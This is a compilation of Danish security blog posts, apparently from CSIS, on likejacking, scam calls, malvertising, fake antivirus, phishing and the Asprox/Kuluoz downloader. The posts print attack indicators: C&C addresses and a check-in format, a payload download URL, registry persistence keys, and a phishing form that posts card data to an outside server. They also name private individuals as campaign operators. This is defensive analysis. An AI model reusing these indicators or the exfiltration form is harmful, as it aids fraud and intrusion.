Vi hører det ofte og bliver tit spurgt: Hvad er Likejacking og hvad betyder det for mig? Herunder følger forklaring samt gode råd.
Mange mennesker ved ikke hvad Likejacking er og hvad det kan betyde for ens Facebook profil og hvordan det generelt også kan påvirke ens venner og bekendte. I denne blog post kigger vi nærmere på fænomenet, som er i eksplosiv vækst på Facebook.
Hvad er Likejacking?
Likejacking minder om clickjacking, men det er ikke helt det samme og bør ikke blandes sammen. Clickjacking er kontra Likejacking mere aggressivt og gør brug af overlappende grafik elementer som narrer brugeren til at klikke på indhold som fejlagtigt udfører en helt anden funktion. Ved Likejacking accepterer brugeren indholdet og "liker" det for at se indholdet. I Likejacking udnyttes således folks nysgerrighed, som ofte pirres med spændende videoklip, hvor man, for at se indholdet skal "synes godt" om det. På den måde anvendes Facebooks "Like" eller "Synes godt om" funktion til at sprede indholdet fra brugerens profil til venner og bekendte, men også andre, som personen ikke kender. Det skyldes at indholdet ofte postes med indstillingen "offentligt tilgængeligt".
De videoklip, som man skal fristes og lokkes til at se er iøvrigt ofte frit tilgængelige på f.eks. Youtube og kan ses uden at man behøver at "synes godt om".
Billeder, rabat- og konkurrencer
Likejacking fænomenet har henover tid udvidet sig til også at pirre med billeder, rabat- og konkurrence kampagner. Filosofien bag Likejacking er simpel; jo flere mennesker der synes godt om et opslag, jo mere spreder det sig og desto mere trafik kan bagmanden suge til sig og tjene penge på. Bagmændene nyder godt af det, da trafik mod deres websider, eksponerer banner reklamer og spændende popups og konkurrencer, og at folk klikker sig videre ind på andre websider. Da denne form for markedsføring selvfølgelig er i gråzonen er der også en risiko for at man fra selv samme websider kan eksponeres for decideret skadeligt indhold.
Likejacking er Facebook spam
Likejacking kan på flere områder sammenlignes med spam man modtager via e-mail. Det er uønsket, og målet er at lokke folk til at klikke sig ind på tvivlsomme websider plastret til med bannere, popups og spændende links. Facebook som medie er oplagt for spammere, idet "synes godt om" integrationen er så enkel at udnytte i viral sammenhæng.
For at give dette en smule mening kigger vi herunder på en klassisk likejacking kampagne som netop nu spreder sig blandt danske Facebook brugere.
En aktiv kampagne
Kampagnen skydes i gang og naive Facebook brugere lokkes til at klikke på indholdet og fra websiden ”synes godt om”. Det resulterer i at brugeren offentligt poster følgende på sin Facebook profil:
Som resultat deles det med alle venner og bekendte, som så kan lokkes til at klikke på indholdet hvorved kampagnen får en viral effekt:
I dette tilfælde flyttes Facebook brugeren, med et klik, ind på websiden:
http://coolhumor.net/video1/
Som man kan se af ovenstående billede, så referer indholdet (javascript) på websiden til en Skype konto der tilhører en dansker. Den samme person kan vi knytte til massevis af tilsvarende kampagner. Det kan også afsløres ved at checke registrant data knyttet til domænet/websiden, som giver os følgende:
Domain Name: COOLHUMOR.NET
Registrar URL: http://www.godaddy.com
Registrant Name: Larsen Larsen
Domænet er hostet på IP adressen 46.23.75.106, som er en virtuel privat server (VPS) der også hoster flere end 200 andre domæner, hvor talrige er koblet direkte til denne og tilsvarende kampagner og kan bindes videre til firmaet: ”Larsen Data ApS” og en Patrick Larsen. Giver det mening? Ja, det gør det, for samme aktør har mange gange lavet Likejacking med målet, at indrulle danske Facebook brugere ind i en uendelig konkurrence karrusel: http://sikkerhed.tdc.dk/publish.php?id=28222
At Likejacking er ”populært” fremgår også af en anden kampagne, som kører sideløbende med ovenstående og som udspringer fra adressen:
http://gothumor.net/video1/ (af gode grunde bringer vi ikke et billede af den webside)
Det er samme person, som stod bag en Likejacking kampagne, hvor der blev lovet gavekort til online fastfood tjenesten ”justeat.dk” og som udsprang fra: fri-justeat.net. Domænet var hostet på samme server, registreret igennem GoDaddy, men registrant data beskyttet via ”Domains by Proxy”. At være anonym i den sammenhæng er givetvis valgt for at beskytte sig mod den utilfredshed den slags vil fremakalde hos ”JustEat” indehaverne. Men i den seneste kampagne har den gode Patrick ikke tilkøbt sig samme anonymitet:
Domain Name: GOTHUMOR.NET
Registrar URL: http://www.godaddy.com
Registrant Name: Patrick Larsen
Uddan om Likejacking og sig nej tak
Likejacking er nemt at genkende. Der lokkes ofte med sensationelle billeder og med genveje til videoklip som man ALTID skal acceptere inden man får lov at se indholdet. Fænomet kan bremses hvis blot almindelige Facebook brugere generelt lærer om Likejacking og de konsekvenser det har nu og i fremtiden. Sig nej til Likejacking og lær dine venner om disse luskede reklame kampganer. Det er støj og spam og bør aflives. Det gøres bedst ved at takke nej!
CSIS blokerer Like- og Clickjacking
Vi har valgt en aggressiv linje overfor den slags tidsrøvere og smarte virale kampagner og blokerer aktivt for kampagnerne i CSIS Secure DNS og Heimdal.
CSIS Blog: Anatomien bag Facebook likejacking
CSIS Nyheder: 10 sikkerhedsudfordringer i 2014
At kigge dybt i krystalkuglen for at forudsige et trusselslandskab som skifter dynamisk og med stor hast, er ikke en opgave at tage let. Ikke desto mindre har vi i CSIS e-Crime Unit forsøgt at samle de trends og tendenser, som vi tror, vil komme til at skabe it-sikkerhedsoverskifter og udfordringer i 2014.
1» Datalækager
Med den digitale udvikling og ikke mindst digitalisering af papirgange, vil big-data fænomenet resultere i flere og større datalækager end vi hidtil har set. Dette kombineret med, at vi over de seneste 2 år har observeret en stigning af inficerede maskiner i Danmark.
En stigning i datalækager er en naturlig konsekvens af at digitaliseringen er blevet gennemført med en hast, hvor de it-sikkerhedsmæssige aspekter ikke er blevet vurderet tilstrækkeligt og derfor ej heller er blevet implementeret forsvarligt. Vi forventer datalækager - også herhjemme - og med en opstraming af regler fra EU, fra 2014 kan føre til dyrt købte lærepenge for danske virksomheder og offentlige myndigheder.
2» Drive-by angreb og patch management
Teknikken, hvor it-kriminelle misbruger sårbarheder i populære software pakker vil fortsætte. Der vil blive stillet krav til at virksomheder og myndigheder implementerer forsvarlige patch-management løsninger.
At patch management er vigtigt, og at drive-by angreb er en reel risiko for enhver virksomhed fremgår også entydigt af ENISA's publikation »ENISA Threat Landscape 2013 - Overview of current and emerging cyber-threats« som kan downloades fra adressen:
https://www.enisa.europa.eu/activities/risk-management/evolving-threat-environment/enisa-threat-landscape-2013-overview-of-current-and-emerging-cyber-threats
3» DDoS og digitale demonstrationer
Vi har allerede set hvordan såkaldte kommercielle DDoS tjenester (Distribueret Denial of Service, også kendt som booters) har givet anledning til bekymringer i det forgangne år. Services, hvor helt almindelige mennesker kan købe sig ind for små penge og sende politiske eller strategiske mål i knæ.
Demonstrationer i form af DDoS angreb og vilkårlige webside defacements vil fortsætte med at påvirke private virksomheder og offentlige institutioner.
4» Angreb mod mobile enheder
Vi har hørt det fra sikkerhedsbranchen før og mange gange, men vi tror på at exploits og malware rettet mod mobile enheder, herunder operativ systemer som Android, Windows mobile og iOS, vil stige betragteligt i 2014. Mobile enheder optager en efterhånden betydelig markedsandel og vil tiltrække sig mere og mere opmærksomhed fra it-kriminelle, som vil forsøge at spinde guld på det.
Vi kan samtidig nikke genkendende til en massiv stigning i malware særligt rettet mod Android, også selvom vi herhjemme i Danmark hidtil har været relativt forskånet for malware til mobile enheder.
5» ByoD
Devices, gadgets og generelt diverse mobilt udstyr, kan være en udfordring for virksomheder og offentlige myndigheder at styre og kontrollere. Vi forventer at 2014 vil være året hvor der vil komme en stribe nye teknologier, som vil gøre dette arbejde nemmere, men at der også forventes afsat betydelige resourcer til dette arbejde. Arbejdet og udfordringerne omkring ByoD (Bring your own Device) er kun lige begyndt.
6» Post-Snowden og data privacy
Overvågning fra statslige myndigheder, i særdeleshed i kølvandet på de mange afsløringer af NSAs systematiske aflytninger og overvågning, vil tvinge markedet over i højere kryptering og databeskyttelsesinitiativer. Overvågningen har været en slem rids i lakken hos flere datacentre og Cloud udbydere, og som konsekvens vil disse, for at genvinde kundernes tillid, være tvunget ud i en stribe initiativer som bedre beskytter data som lagres udenfor virksomhedens netværk.
Men derudover forudser vi også, at flere virksomheder i 2014 vil begynde at implementere stærk kryptering på e-mail og andre populære Internet baserede transport kanaler.
Kapløbet på at beskytte data med kraftig kryptering er flere steder blevet refereret til som en forstående »Cryptowar«.
7» Målrettede angreb / spear phishing
I 2012 og 2013 har vi set talrige spear phishing og targeted angreb som gør brug af en blanding af 0-dags sårbarheder og APT (Advanced Persistent Threats). Herhjemme, og i flere lande som vi sammenligner os med, er der allerede afsat store budgetter til at forsvare sig mod målrettede angreb.
At man samtidig i jobopslag åbenlyst søger efter personer med særlige tekniske offensive kompetencer, signalerer en optrapning af statssponsorede digitale angreb, og som heraf også krav til øget fokus på beskyttelse af sensitive data.
8» Mere avanceret crimeware
Det er en god forretning af stjæle digitale værdier på nettet. Det har skabt en pulserende undergrundsøkonomi, hvor hackere og dygtige udviklere på den ene side fortsætter med at udvikle og sælge kommercielle »Crime as a Service« produkter og regulære Crimekits, og på den anden side de berørte interessenter som forsøger at beskytte kundernes aktiver.
Som en konsekvens af at flere af de mål som de it-kriminelle de senete 10 år har udvalgt som deres primære mål, nemlig finansielle institutioner, har disse også oprustet sikkerheden på flere områder. Det stiller store tekniske krav at omgå sikkerheden i systematiske og omfattende angreb, hvorfor vi forventer at de it-kriminelle vil flytte fokus fra almindelige bankkunder, mod virksomheder og offentlige institutioner, som har betydeligt flere økonomiske midler til rådighed på deres konti. Et våben som de it-kriminelle vil indbygge i disse værktøjer og services, er muligheden for at lave »realtidsangreb« og »social engineering«.
9» Windows XP support død
I April 2014 vil Microsoft stoppe med at supportere Windows XP. Det betyder også, at software giganten vil ophøre med at udsende opdateringer til et af de mest populære og udbredte operativ systemer nogensinde.
Med ophøret af Windows XP support vil millioner af maskiner, som ikke har foretaget opgradering eller skiftet til et andet operativsystem, potentielt sidde tilbage som kanon føde for skadelig kode.
Windows XP er ikke alene et slutbruger produkt, men findes også i talrige konsoller som ikke let lader sig opgradere. Det gælder eksempelvis betalingsautomater, terminaler i lufthavne, pengeautomater og terminaler i produktionsmiljøer. Indlysende nok vil ophøret af support af Windows XP efterlade en masse af disse installationer uden mulighed for at lappe sårbarheder som opstår, medmindre der tegnes en separat og dyr aftale med Microsoft. Vi forudser i den sammenhæng at mange af disse systemer vil blive efterladt i drift, men samtidig også i risikozonen for potentielt misbrug/infektioner.
10» Kodesigneret malware
Vi har allerede i løbet af 2013 set en markant stigning i malware som er blevet digitalt signeret med stjålne certifikater der stammer fra legitime virksomheder og udviklere.
Formålet med at misbruge kodesignering er indlysende at opnå en højere grad af trust/tillid, idet udstederen af den binære kode valideres igennem signeringen af koden. IT-kriminelle har misbrugt dette både i forbindelse med målrettede angreb, men også mere vidt spredte angreb med netbank- og informationstyve, ransomware og falske sikkerhedsprodukter er observeret gøre brug af digital kode signering.
Når it-kriminelle laver kode signering er det således formålet at få koden til at fremstå legitim. Flere sikkerhedsløsninger, herunder antivirus produkter, vurderer koden ved bl.a. at kigge på om den er digitalt signeret og om kilden er tillidsfuld. På den måde kan signeret malware undslippe sikkerhedsløsninger.
Konklusion
Det tegner til at blive et travlt 2014 indenfor it-sikkerhedsbranchen, men ikke mindst for de mange danske virksomheder og offentlige myndigheder som skal forsøge at beskytte deres digitale værdier i et komplekst trusselslandskab hvor angreb og truslerne kommer fra mange sider. Det konkluderer CSIS i "10 danske it-sikkerhedsudfordringer i 2014" som netop er publiceret.
Firmaets forventer at se flere inficerede maskiner, flere datalækager, skærpet frygt for overvågning og generelt øget fokus på it-sikkerhed i det kommende år. I modsætning til tidligere har også ledelsen i mange danske virksomheder indset at it-sikkerhed skal prioriteres højere.
CSIS Blog: Glædelig jul!
CSIS ønsker alle vores kunder, samarbejdspartnere og venner en glædelig jul med ønsket om et sikkert og lykkebringende nytår!
Også i 2014 vil CSIS Security Group A/S arbejde benhårdt og målrettet for at sikre vores kunders digitale værdier og identitet på nettet.
Vi frigav for nyligt vores sikkerhedsforudsigelser for 2014, og holder de stik bliver det også et travlt 2014.
Med disse ord; glædelig jul og godt nytår!
CSIS Nyheder: Asprox er tilbage
I løbet af juledagene har personerne bag BOTnettet Asprox udsendt i tusindvis af spammails til vilkårlige e-mail adresser. Dagens lokkemad er en licens til Adobe, som er vedhæftet som et zip-arkiv. I det pakkede zip-arkiv finder vi en binær kode maskeret med et Word ikon, så ofret skal tro at der er tale om et dokument, men i virkeligheden er det en Win32PE som hører til familien, Kuluoz. Kuluoz er en downloader der henter en cocktail af malware.
Den uønskede e-mail ankommer med følgende indhold:
Hvis den vedhæftde fil udpakkes vil ofret narres til at tro at der er tale om et Word dokument.
Hvis filen køres vil den åbne Notepad med følgende fejlbesked:
Unknown ERROR! Please wait and try again later.
I baggrunden dropper den sin skadelige kode med et vilkårligt filnavn og injekter sig i svchost.exe processen.
I næste fase ringer den hjem til den centrale Command & Control (C&C) server via WININET.DLL og API'et InternetOpenA, hvor maskinen indrulles med følgende ledsagende data:
<knock>
<id>%s</id>
<group>%s</group>
<src>%d</src>
<transport>%d</transport>
<time>%d</time>
<version>%d</version>
<status>%d</status>
<debug>%s</debug>
</knock>
http://%[^:]:%d/%s
ind mod den statiske URL:
/index.php?r=gate
I det pågældende sample, kompileret [Sat Dec 21 08:15:08 2013 UTC], anvendes følgende IP adresser som C&C servere:
202.29.64.35:8080
91.185.204.47:8080
Kommunikationen sendes med agent strengen:
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
og i krypteret form med følgende public key:
"-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUAUdLJ1rmxx+bAndp+Cz6+5IKmgap2hn2df/UiVglAvvg2US9qbk65ixqw3dGN/9O9B30q5RD+xtZ6gl4ChBquqwjwxzGTVqJeexn5RHjtFR9lmJMYIwzoc/kMG8e6C/GaS2FCgY8oBpcESVyT2woV7U00SNFZ88nyVv33z9+wIDAQAB-----END PUBL"
Kuluoz komponenten indeholder en række funktioner som kan udstedes fra C&C serverne, herunder opdater og fjern, så komponenten tjener primært som "downloader". I vores analyse hentede den et falsk antivirus program for i næste fase at installere rootkittet ZeroAccess.
Koden indeholder en funktion som afgør hvilket antivirus- og firewallsoftware som er installeret på maskinen: "SELECT * FROM AntiVirusProduct", "SELECT * FROM FirewallProduct". Det sendes til C&C server som del af "For group!!!!!" og anvendes formentligt i forbindelse med at udvælge forskellige binære pakker udfra hvilket antivirus program og firewall ofret har installeret. Sammen med disse data sendes en stribe andre oplysninger om den inficerede maskine herunder hostnavn, IP adresse, produktnr, installationstidspunkt, software installeret osv.
Den binære kode indeholder følgende tekststrenge:
"For base!!!!!"
"For group!!!!!"
"You fag!!!!!"
"2112s"
"s0qrXrBupC"
Vi har set flere spamkampagner fra Asprox i slutningen af december måned bl.a. har banden også anvendt:
"Hearing of your case in Court NR#[%vilkårligt nummer%]"
"Notice of appearance in court NR#[%vilkårligt nummer%]"
samt lokkemad fra Costco, BestBuy, Walmart som beskrevet på ISC:
https://isc.sans.edu/diary/Costco+BestBuy+Walmart+really+want+to+send+you+a+package+/17276
og Dynamoo's blog:
http://blog.dynamoo.com/2013/12/hearing-of-your-case-in-court-nr6976.html
En scanning på Virustotal giver følgende resultat (32 / 43)
https://www.virustotal.com/en/file/d5ec477dc0b39867b39a56b9ca7652c8ea115533583d8b6211c1e4f53537bbb2/analysis/
CSIS Blog: Ny bølge af telefonsvindel
CSIS har henover julen modtaget en stribe anmeldelser fra helt almindelige danskere, som i den forløbne uge, og særligt i dag, har modtaget telefon opkald fra følgende mobilnummer: 61208014.
En engelsk talende person præsenterer sig for at komme fra Windows Service og ønsker at afhjælpe et problem på ens PC. Svindleren forsøger under samtalen at lokke ofret til at give fjernadgang til PC'en, hvorefter svindleren kan fjernstyre maskinen og installere uønsket software.
61208014 er et taletidskort fra TDC mobil.
Denne type Microsoft support svindel har været kendt i årevis men denne svindelkampagne ser ud til at have et helt specifikt mål; at installere uønsket software som senere kan misbruges til datatyveri og potentielt netbank indbrud.
Microsoft ringer aldrig til deres kunder for at tilbyde fjernsupport!
Vi henviser til Microsoft egen advarsel om disse falske support opkald:
http://www.microsoft.com/danmark/sikkerhed/svindlere_udgiver_sig_for_at_vaere_microsoft.htm
CSIS Blog: Java opdatering uden NemID bøvl
Oracle er klar med en omfattende opdatering til Java JRE. CSIS har testet den og den giver ikke umiddelbart problemer med det offentlige NemID.
Java 1.7u60, som slippes fri senere i dag, har strammet en del på sikkerheden i arkitekturen og fortolkeren. En af de mest radikale ændringer der gennemføres er, at Java ikke længere tillader afvikling af usignerede applets. Denne stramning har omfattende effekt på et stort antal løsninger som gør brug af Java.
Vi har testet NemID op mod den nye Java JRE sikkerhedsopdatering og den testede beta version giver ikke nogen umiddelbare fejl og introducerer ikke nogen ubehagelige overraskelser, så medmindre at ny funktionalitet eller ændringer tilføjes af Oracle i sidste øjeblik, skulle det være sikkert at installere opdateringen når den frigives i aften.
Heimdal vil automatisk opdatere alle sårbare versioner til seneste version.
Udover Oracle vil Microsoft og Adobe også udsende opdateringer i aften som også automatisk installeres igennem Heimdal.
CSIS Blog: Kvinde spises af Anaconda
Kan du lokkes til at klikke på den slags spændende overskrifter og mindst ligeså spændende links til videoer, hvis du ser dem på Facebook? Det korte svar burde være: "for pokker da nej".
Vi advarer her mod dagens mere trivielle, men stadig unødigt støjende Likejacking kampagne. I dag lokkes der med en kvinde som "spises af en Anaconda". Ja, tak for kaffe! Naturligvis fake så det driver, men det virker åbenlyst...
Som det fremgår af ovenstående billede trækkes trafikken via domænet: insanelist.net (kan man roligt blokere), men derfra sendes brugeren videre til en server på IP adressen: 192.186.247.174. Denne server er særligt spændende, idet den huser flere andre Likejacking kampagner. Et kig ned i mappe strukturen (da den er komplet åben for enhver) giver os en god ide om hvad vi har i vente fra disse amatører:
anaconda/
anaconda2/
dare/
dareyou/
iphone/
nice/
nutella/
pencil/
pimple/
roller/
shark/
spider/
worm/
Hvis man vil vide mere om Likejacking, så læs venligst vores artikel: "Anatomien bag Likejacking" eller endnu bedre. Send den til de venner som konstant "synes godt om den slags og støjer": https://www.csis.dk/da/csis/blog/4118/
Måske artiklen kan hjælpe folk til at lade være med at "Like" / "Synes godt om" alle de tåbelige videoer som er i omløb?
CSIS Blog: Svindel support nu også til Mac og smartphones
Vi har berørt dette emne flere gange, men vi modtager desværre fortsat massevis af henvendelser fra helt almindelige danskere der har oplevet underlige telefonopkald fra "Microsoft support", som med en udtalt indisk accent, ønsker at afhjælpe problemer og virus på ofrets maskine. På det seneste kan supporterne nu også afhjælpe andre operativ systemer end blot Windows. Måske svindlerne er blevet trætte af at høre: "Men jeg kører altså Mac?!".
Disse fup-opkald, som vil tilbyde dig teknisk support, har på det seneste udvidet sig til, udover Windows som har været det foretrukne mål i flere år, også at omfatte Mac, tablets og smartphones. Ja, faktisk er banditerne også begyndt at lave søgemaskine optimering (SEO), som leder brugeren direkte i armene på svindlerne der tilbyder deres support fra talrige websider. Et sådan eksempel er websiden: techsupportcenter.org, som vi naturligvis allerede har blokeret i CSIS Secure DNS. Her tilbydes fjernsupport via LogMeIn til Mac og Windows, men også teknisk hjælp til konfiguration og fejlsøgning af antivirus, routere og printere, smart phones og tablets samt browsere.
Formålet med deres support er at vrøle og lyve sig igennem fiktive virusinfektioner, hvor ofret skal skræmmes til at tegne et abonnement på tvivlsom software, men værre endnu er det, at man lukker disse banditter ind på sit system. Vi har set disse tekniske support svindlere lokke brugere til at installere fjernbetjeningsværktøjer som kan give dem uhindret adgang til maskinen så længe den er tændt og online.
I de seneste fup opkald i Danmark skal man lokkes til at købe 1 års support via websiden click4support.net (se skærmdump herunder).
Af websiden fremgår det at firmaet lader sig betale for forskellige typer services i prisklassen fra 299 dollars for et års support til prívate og et preminum årligt abonnement til 499 dollars. Fra samme webside sælger de også produktet "Optimopro" og "C4S System Optimizer" der begge er i kategorien "system optimeringsværktøjer".
Et whois opslag af domænet giver os ikke mange oplysninger om ejerskab, men bekræfter os blot i at dette er svindel og fup.
Domain Name: CLICK4SUPPORT.NET
Registry Domain ID: 1669316458_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.wildwestdomains.com
Registrar URL: http://www.wildwestdomains.com
Update Date: 2013-11-20 13:49:23
Creation Date: 2011-07-28 14:03:16
Registrar Registration Expiration Date: 2015-07-28 14:03:16
Registrar: Wild West Domains, LLC
Registrar IANA ID: 440
Registrar Abuse Contact Email: XXXXX@wildwestdomains.com
Registrar Abuse Contact Phone: +1.480-624-2505
Reseller: faddu.com
Domain Status: clientTransferProhibited
Domain Status: clientUpdateProhibited
Domain Status: clientRenewProhibited
Domain Status: clientDeleteProhibited
Registry Registrant ID:
Registrant Name: Abigail rex
Registrant Organization: Innovazion
Registrant Street: 12 Main st
Registrant City: essex
Registrant State/Province: Connecticut
Registrant Postal Code: 06426
Registrant Country: United States
Registrant Phone: +1.8606610039
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: medisureamerica@live.com
Kan vi linke den Microsoft Live konto, som domænet er registreret med, til andre svindel sider?
Ja vi kan. Samme e-mail adresse har bl.a. registreret:
Fixslowpc.us
Techxpertz.us
Fasttechsupport.us
click4backup.org
ixpertz.com
Et opslag på Alexa afslører at domæne (click4support.net) tiltrækker sig mest trafik fra Indien.
Primary Traffic: in India (Alexa Rank #96,241 in India)
Interessant ...
Hvis vi kombinerer telefon nummer, og andre data, finder vi flere typer potentiel svindel fra samme personer. Der tilbydes tilsyneladende både kræftbehandling og forskellige forsikringer:
cancertreatmentsinindia.com
petcareinsurances.com
insurancesfind.com
insurancefinancehelp.com
astroinsurance.info
[...]
Som nævnt indledningsvis gør firmaerne bag disse "tekniske support" services nu også brug af søgemaskine optimering og særligt via Microsoft BING. Vi har blokeret flere end 20 domæner i CSIS Secure DNS under kategorien "Scam/Spam" og alle tilsynladende knyttet til samme person/gruppe.
CSIS Blog: Forgiftede reklame bannere via TV2.dk
Flere danske medier og dermed populære og velbesøgte websider, herunder tv2.dk, har i dag leveret en skadelig reklame, som via et indlejret "actionscript" i et Flash banner, har flyttet besøgende over på en fjendtlig webside. Den fjendtlige webside forsøger at installere et falsk sikkerhedsprogram som foregiver at komme fra Microsoft. Se vedhæftede skærmdumps herunder.
Den skadelige kode leveres via domænet (mellemrum indlagt af CSIS)
Første fase:
90d6bc5a.tj-microdefender.nl/index.php?key[%ID token%]
--> 90d6bc5a.tj-microdefender.nl/dd/install.exe
Domænet oversættes til IP adressen 212.83.155.45 hjemhørende hos AS12876 ONLINE S.A.S. i Frankrig.
Anden fase (opdatering af domæne)
lj-microdefender.nl
Oversættes til en server i Rumænien: 93.115.82.247.
Begge domæner er registeret igennem:
Key-Systems GmbH
Im Oberen Werk 1
66386
St. Ingbert
Germany
Vi har blokeret domænet i CSIS Secure DNS.
Denne banner injektion kommer ca. 1 uge efter at tilsvarende banner injektion kampagne blev skudt i gang via Ekstrabladets webside.
CSIS Blog: Sværm af "Windows Ultimate Booster" infektioner i Danmark
CSIS har hen over de seneste dage modtaget massevis af henvendelser fra virksomheder og brugere som er ramt af et falsk antivirus program som kalder sig "Windows Ultimate Booster".
Den uønskede software frembringer talrige advarlser og gennemfører massevis af ændringer på systemet.
En inficeret maskine vil frembringe følgende fejlbeskeder:
1.
Error
System data security is at risk!
To prevent potential PC errors, run a full system scan.
2
Error
Trojan activity detected. System integrity at risk.
Full system scan is highly recommended.
3
Firewall has blocked a program from accessing the Internet
C:Program FilesInternet Exploreriexplore.exe
is suspected to have infected your PC.
This type of virus intercepts entered data and transmits them
to a remote server.
4
Warning! Identity theft attempt detected
Hidden connection IP: xx.xxx.xxx.xxx
Target: Microsoft Corporation keys
Your IP: 127.0.0.1
Formålet er at lokke ofret til at købe den licenserede version. Det er spild af penge og er benzin på bålet. Det bør man afstå fra.
Windows Ultimate Booster kopierer sig til følgende stier på systemet:
%APPDATA%svc-[RANDOM CHARACTERS]
%APPDATA% svc-mamk.exe
%APPDATA%data.sec
Disse skal slettes for at rense maskinen.
Den modificerer også registreringsdatabasen med flere runas værdier:
HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon "Shell" = "%AppData%svc-.exe"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun "GuardSoftware" = %AppData%svc-.exe
[..]
Det uønskede og falske "antivirus" program forhindrer flere windows procceser i at starte op:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsk9filter.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsMpCmdRun.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsMpUXSrv.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsMSASCui.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsconfig.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsmpeng.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsseces.exe
[..]
For at fjerne denne infektion bør man følge denne vejledning:
http://www.bleepingcomputer.com/virus-removal/remove-windows-ultimate-booster
Hvordan blev jeg inficeret?
Infektionen skyldes typisk at brugeren lokkes til at åbne installationsprogrammet igennem en falsk popup på en webside eller ved at programmet udnytter sårbarheder på maskinen. I den forbindelse kan vi kun anbefale, at man installerer Heimdal (https://heimdalagent.com), der automatisk opdaterer alle de trejdepartsprodukter som denne type malware misbruger. Heimdal er gratis for private brugere og kan købes i en PRO og corporate udgave som også indeholder webfilter og malware detektion.
Vi har naturligvis allerede blokeret de domæner hvorfra denne falske sikkerhedspakke spredes, i CSIS Secure DNS.
Windows Ultimate Booster går også under andre navne som f.eks.:
Windows Efficiency Kit, Windows Safety Master, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro.
Den uønskede malware opnår kun begrænset AV detektion i følge Virustotal (3/50):
https://www.virustotal.com/da/file/a8b211b3f0b92731c3b8343b0b74fc3b2b4960e421a6fb47a991fb3f1a4d7f72/analysis/1390864409/
CSIS Blog: Snedig Mastercard phish i omløb
En usædvanligt snedig og velformuleret phishing kampagne, som lokker vilkårlige brugere til at opgive sensitive oplysninger er i omløb.
Den uønskede e-mail ankommer med følgende indhold:
Fra: Information [SecureCod@mastercard.dk]
Emnelinje:
FW: Artikel 201/02/2014
Indhold:
I overensstemmelse med artikel 201/02/2014, for den Europæiske Union, fra 14/02/2014 til fortsat at bruge dit kreditkort online, er du kræves for at fuldføre godkender vedlagte formular.
Vedhæftet:
mastercard.zip -> MasterCard.html
Den medfølgende html fil lokker ofret til at opgive flere yderst sensitive data. Se skærmdump herunder:
Data der opgives, den lokale formular, sendes til en server, som intet har med Mastercard at gøre, men det kan ofret ikke se:
<form method="post" action=http://www.powerfit24.at/mail.php>
Vi har blokeret domænet i CSIS Secure DNS og Heimdal yder desuden også beskyttelse mod datatab i forbindelse med dette phishing angreb.
CSIS Blog: Arbejd hjemmefra tilbud
Vores postkasser bugner i øjeblikket af jobtilbud, der lokker med god indtægt og minimal arbejdsindsats.
Det er naturligvis svindel, der slår plat på recessionen og den lidt sørgelige arbejdsløshedsstatistik. På overfladen ser alting meget poleret ud med aktieindex og noget der ligner en online finansrapport, men det fremgår på ingen måde, hvad "arbejdet" rent faktisk går ud på. Det pæne ydre er kun brugt til at fange det jobhungerende offers opmærksomhed.
Hvis man skulle føle sig fristet af tilbuddet, bliver man ledt videre til en registreringsside. Hvis man her skulle få kolde fødder og forsøge at navigere væk fra siden, får man et helt fantastisk tilbud:
Man kan simpelthen spare $100 her og nu, hvis man skriver sig op til dette job! Man skal altså betale for at arbejde her?
- JA!
Men til gengæld tilbydes hele denne fantastiske startpakke med i købet, der bl.a. inkluderer medlemskab, start guide, 30 min. onlinetræning, ubegrænset chat support og en masse andre lækkerier:
- Guaranteed immediate placement! (Value: Priceless)...
- Access to the Members Area with dozens of resources, and more added all the time (Value: $997)...
- The official quick-start guide, Introduction to CPA Affiliate Marketing, regarding how you can make money posting links from home (Value: $97)...
- Your free, 30-minute one-on-one consultation with a success adviser (Value: $150)...
- Free, unlimited access to chat support (Value: $497)...
- And a lot more as described earlier (Value: Hundreds of dollars)...
Jeg er nysgerrig, hvad går arbejdet ud på?
Du skal såmænd spamme links ud alle de steder, du kan komme i tanke om. Det kan være sociale medier, blogs, kommentarfelter på nyhedsmedier eller hvor som helst, hovedsagen er, at du får nysgerrige brugere til at klikke på linket, og der bliver afregnet efter "Pay-per-click".
Ifølge deres beregning kan en ihærdig spammer altså tjene op i mod $117.000 om året.
Vi kan ikke bekræfte, hvilke links der er tale om, men det kan være alt fra kinesiske handelssider, pharma-produkter, dating – men i princippet også decideret skadelige drive-by sider.
Enhver der har beskæftiget sig med salg ved, at hvis der er noget forbrugere ikke kan stå for, er det begrænsede udbud. Hvis det er et "Kun i dag", "Max 8 pr. kunde" eller et "Kun 5 stk. tilbage" – bliver fristelsen så meget desto større. I nærværende tilfælde bliver der præcist spillet på dette, men uanset hvor mange der tilmelder sig, vil der altid være "kun 2 pladser tilbage".
Uanset hvordan man vender og drejer dette jobtilbud, så er der kun én vinder – og det er ikke ansøgeren.
CSIS Blog: Facebook spam og tvivlsomme medicinal produkter
Vi har observeret en bølge af spammails ramme danske, men også andre vilkårlige indbakker.
Den pågældende uønskede e-mail foregiver at komme fra Facebook, men peger på flere kompromitterede maskiner/servere der leverer et script der flytter brugeren videre til flere domæner hvorfra der tilbydes yderst tvivlsomme medicinal produkter.
Den uønskede Facebook spammail ankommer med følgende indhold:
Det inkluderede link peger, som tidligere nævnt på en kompromitteret maskine/server som leverer nedenstående obfuserede javascript:
